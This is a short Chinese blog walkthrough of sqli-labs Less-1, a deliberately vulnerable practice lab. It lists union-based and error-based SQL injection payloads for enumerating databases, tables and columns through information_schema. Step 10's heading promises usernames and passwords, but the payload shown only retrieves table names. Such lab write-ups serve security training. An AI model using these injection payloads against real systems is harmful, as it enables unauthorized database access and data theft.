1. 首页
  2. web安全
  3. 正文

sqli-labs闯关练习 1

2020年06月03日 85点热度 0人点赞 0条评论

less1

在这里插入图片描述

1.输入id=1,得到了ID和Password

?id=1
在这里插入图片描述

2.and 1=1 和 1=2都没有报错

在这里插入图片描述

3.加上单引号后出现报错,可能存在SQL字符注入

在这里插入图片描述
在这里插入图片描述

4.用–+将‘注释掉后回显正常,说明这里是单引号字符型注入

在这里插入图片描述

5.用order语句判断列数,order by 3没有报错,改为4的时候出现回显错误,说明这个表有3列

在这里插入图片描述

6.将id=1改为一个数据库不存在的id,用union select 1,2,3联合查询语句查看是否有回显

在这里插入图片描述
发现输出了2和3,说明有两个回显位
在这里插入图片描述

7.用sql语句,查询数据库名

(select group_concat(schema_name)from information_schema.schemata)
在这里插入图片描述
在这里插入图片描述

8.用sql语句,查询security中的所有表名

(select group_concat(table_name) from information_schema.tables where table_schema='security')
在这里插入图片描述
在这里插入图片描述

9.查询出列名

select group_concat(column_name) from information_schema.columns where table_name='users'
在这里插入图片描述

10.查询所有的用户名,密码

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
在这里插入图片描述
标签:
最后更新:2020年06月22日

luoluo

我爱吃螺蛳粉

文章评论

日历📅
2020年6月
1234567
891011121314
15161718192021
22232425262728
2930  
分类🏷️
文章归档✏️
音乐🎵

COPYRIGHT © 2020 LUOLUO 🍑. ALL RIGHTS RESERVED.

THEME KRATOS MADE BY VTROIS

蜀ICP备20004377号